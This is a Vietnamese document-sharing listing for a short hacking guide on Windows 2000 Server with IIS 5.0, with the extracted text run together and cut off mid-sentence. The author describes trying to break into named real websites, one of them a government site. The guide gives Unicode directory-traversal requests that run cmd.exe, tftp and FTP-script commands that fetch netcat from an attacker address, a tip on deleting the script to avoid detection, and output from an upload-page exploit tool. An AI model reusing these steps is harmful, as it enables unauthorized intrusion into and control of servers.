Danh mục

Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0

Số trang: 2      Loại file: doc      Dung lượng: 34.00 KB      Lượt xem: 17      Lượt tải: 0    
Hoai.2512

Hỗ trợ phí lưu trữ khi tải xuống: miễn phí Tải xuống file đầy đủ (2 trang) 0

Báo xấu

Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Qua nghiên cứu cách upload/download file trên một số Server khi tìm cách hack website http://www.cantho1260.net/ và http://www.cantho.gov.vn/ sử dụng Windows 2000 Server chưa patch lỗi thì tôi nhận thấy có một số kinh nghiệm sau đây xin viết vài dòng để chia sẻ cùng với anh em và nếu có thiếu xót xin bổ sung cho. Để Upload netcat lên dùng TFTP thì đơn giản, nhưng trước tiên chúng ta phải cài TFTP server trên system (203.162.30.219). Sau đó cho thi hành các lệnh sau đây trên system của Victim bằng cách dùng một số lỗi như System Traversal...
Nội dung trích xuất từ tài liệu:
Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0KinhnghiệmkhiHackWindows2000ServerIIS5.0:trangnàyđãđượcđọc lầnQuanghiêncứucáchupload/downloadfiletrênmộtsốServerkhitìmcáchhackwebsitehttp://www.cantho1260.net/vàhttp://www.cantho.gov.vn/sửdụngWindows2000Serverchưapatchlỗithìtôinhậnthấycómộtsốkinhnghiệmsauđâyxinviếtvàidòngđểchiasẻcùngvớianhemvànếucóthiếuxótxinbổsungcho.ĐểUploadnetcatlêndùngTFTPthìđơngiản,nhưngtrướctiênchúngtaphảicàiTFTPservertrênsystem(203.162.30.219).SauđóchothihànhcáclệnhsauđâytrênsystemcủaVictimbằngcáchdùngmộtsốlỗinhưSystemTraversalcủaUnicodeExploitchẳnghạn:GET/scripts/..%c0%af…/winnt/system32/tftp.exe?”1”+203.162.30.219+GET+nc.exeC: c.exeHTTP/1.0VídụtrênsẽtrỏđếnC:vìđâylàthưmụcmàaicũngcóthểWritevàođượckhôngcóPermitphảilàAdminhaykhông.NếuNetcatđãcósẵnbạnsẽnhậnđượcmộtthôngbáolà“tftp.exe:can’twritetoC: c.exe”,nhưngnếuthànhcôngthìBrowsersẽtrảvềlỗi“HTTP502GatewayError”vàmộtMessagelà:“Transfersuccessful:59392byteinxsecond,59392bytes/3s.”DùngFTPthìhơinhọccônghơnvìphảiquamộttrunggian,hãytạomộtfiletêngìcũngđượctrênmáyVictimđểdùngFTPscriptvớicommandlà–s:[filename]sauđóScriptsẽgiúpchoFTPClienconnectđếnmáychúngtađểdownloadnetcatvềlocalcủaHost.Trướckhitạofilenàychúngtachắcchắnlàsẽbịcảntrở.Vàđểvượtquathìcómộtmẹonhỏlàhãycopyđổitênfilecmd.exethànhmộttênkháctrướcđã.GET/scripts/..%c0%af.../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe+c:aclatinh.exeHTTP/1.0OK!Filecmd.exebâygiờđãđượccopysangmộtbảnkháccótênlàaclatinh.exe,bâygiờchúngtalạiphảighivàoC:vìnhưđãnóilàđâylànơimàbấtcứaicũngcóthểwritevào.BâygiờphảitạomộtfileFTPscriptbằngcáchdùnglệnhecho.SauđâylàmộtnộidungcủamộtfileScript,chúngtasẽchọntênfilelàftpaclatinhvàusernamecủaFTPlàanonymous,passwordlàa@a.com,FTPserverlà192.168.2.31.GET/scripts/...%0c%af../aclatinh.exe?+/c+echo+anonymous>C:ftpaclatinh&&echo+a@a.com>C:ftpaclatinh&echo+bin>>C:ftpaclatinh&&echo+get+test.txt+C: c.exe>>C:ftpaclatinh&&echo+Bye>>C:ftpaclatinh&&ftp+s:C:ftpaclatinh+192.168.234.31&&del+C:ftpaclatinhOK!SaukhithựchiệnscripttrênnósẽcopynetcatđếnC: rênServervàxóaluônfilescriptftpaclatinhđểtránhbịpháthiện.Nhưnglưuýlàtừdòngthứ2phảidùng“>>”đểbốsungthêmvàoftpaclatinhchứkhôngphảilà“>”._Tạofilebằnglệnhecho:DĩnhiênlànếuFTPvàTFTPkhôngcósẵn,trườnghợpnàychỉxảyrađốivớimộtsốadmincótính“tàotháo”haybịBlockbởifirewallchẳnghạnthìchúngtaphảidùnglệnhEchođểgõtừngdònglệnhvàovídụnhưlànộidungcủafilecmd.aspchẳnghạnthìcáchlàmnhưsau:đểtạofilethìgõvào“echonộidung>c: enfile&vol”vàđểthêmnộidungvàofiletrênthìgõvào:echonộidung>>c: enfile&volvàcứthếtuylâunhưngcònhơnkhônglàmđượcgì.VàmộthackercótênlàRelofTemminghcũngcóviếtsẵnmộtScritpchoUnicodeExploitdướidạngngônngữPerlcótênlà“cgidecodeloader.pl”cũngdùngcáchechovàgiántiếpđểtạora2filelàupload.aspvàupload.incchophépuploaddựatrênBrowserthuậntiện(vàôngtacũngcóviếtmộtScriptlà“unicodeexcute.pl”chophéphackerthihànhlệnhtừxa).Dùngunicodeloder.plthìtrướctiênphảichắcchắnlàhaifileupload.aspvàupload.incphảicócùngtrongthưmụcchứafileunicodeloader.plvàcầnxácđịnhthưmụcnàocủaServerchophépWritablevàexcutableđãthườngthìnólàC:intetpubscripts,làdefaultkhiinstallWindows2000.C:>Perlunicodeloader.plUsage:unicodeloaderIP:portwebrootC:>Perlunicodeloader.plcantho1260.net:80C:inetpubscriptsCreatinguploadingwebpageonvictim.comonport80.ThewebrootisC:inetpubscripts.testingdirectory/scripts/..%c0%af../winnt/system32/cmd.exe?/cfarmerbrowndirectory:c:inetpubscriptsauisnotrecognizedasaninternalorexternalcommand,operableprogramorbatchfile.sensepost.exefoundonsystemuploadingASPsection:..............uploadingtheINCsection:(thismaytakeawhile).................................................................................uploadpagecreated.Nowsimplysurftocaesars/upload.aspandenjoy.FileswillbeuploadedtoC:inetpubscriptsVàchúngtahãykhảoxáccáchnólàmviệc.Trướctiênnósẽcopycmd.exethànhmộtfilecótênlà“sensepost.exe”đếnthưmụcđãxácđịnhlàWebroot,ởđâylàC:Intetpubscriptssauđónóbypassquacmd.exegiántiếp(“>”)quaexploit.vàsensepost.exeđượcdùngđểechovàgiántiếp2fileupload.aspvaupload.inctừngdòngmãmộttronghaifileđểvàothưmụcWroot(ởđâylàC:Inetpubscr ...

Tài liệu được xem nhiều: